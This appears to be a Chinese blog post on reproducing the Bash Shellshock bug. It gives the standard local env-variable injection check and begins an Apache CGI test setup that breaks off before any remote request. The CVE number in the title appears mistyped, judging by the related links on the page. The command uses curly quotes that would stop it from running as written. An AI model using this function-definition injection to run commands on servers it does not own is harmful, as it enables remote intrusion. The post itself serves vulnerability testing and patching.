Bash Shellshock(cve-2014-6217)漏洞简单复现
2020-01-14 20:20
996 查看
Bash Shellshock(cve-2014-6217)漏洞简单复现
关于这个漏洞,我主要讲两个验证方法。一是本地验证方法,二是远程模拟验证方法。
1:本地验证
直接在shell中输入执行以下命令: env x=’(){ :;}; echo Vulnerable CVE-2014-6217 ’ bash -c “echo test”
如果显示echo Vulnerable CVE-2014-6217,就证明系统存在该漏洞。可将"echo Vulnerable CVE-2014-6217"改为任意命令进行执行。
验证成功!
2:远程模拟验证
1:安装apache2
使用命令: sudo apt-get install apache2
2:打开配置文件#sudo vi /etc/apache2/sites-enabled/000-default
修改配置语句:
DocumentsRoot /var/www/html
ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/
3:编辑服务端测试文件:
#sudo vi /var/www/html/cgi-bin/test.sh(记得提前创建好路径)
内容:
#!/bin/bash
echo"Content-type:text/html"
echo""
4:重启服务
#sudo /etc/init.d/apache2 restart
5:进行测试
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- Bash Shellshock事件:CVE-2014-6271资料汇总
- Bash Shellshock事件:CVE-2014-6271资料汇总
- How to find and fix Bash Shell-shock vulnerability CVE-2014-6271 in unix like system
- 心脏滴血漏洞复现(CVE-2014-0160)
- CVE-2014-6271: BASH 漏洞记录
- 心脏滴血漏洞复现(CVE-2014-0160)
- 趋势科技对ShellshockBash漏洞的解决方案说明
- 2016新年Bash的CVE-2014-6271漏洞修复经历
- 银行和企业奋力打击Bash Shellshock 漏洞
- 漏洞分析---Bash安全漏洞(CVE-2014-6271)技术简析
- 心脏滴血漏洞(CVE-2014-0160)复现
- Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
- 汉澳sinox2013已经提供bash Shellshock漏洞修复安装包
- CVE-2014-6271 Shellshock 破壳漏洞 复现
- CVE-2014-6271 Bash 安全漏洞 MAC OS X 10.9 修复过程
- 【漏洞复现】心脏滴血漏洞(CVE-2014-0160)复现
- 一次简单的心脏滴血漏洞利用CVE-2014-0160
- bash漏洞修补, CVE-2014-6271
- Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
- 心脏滴血漏洞复现(CVE-2014-0160)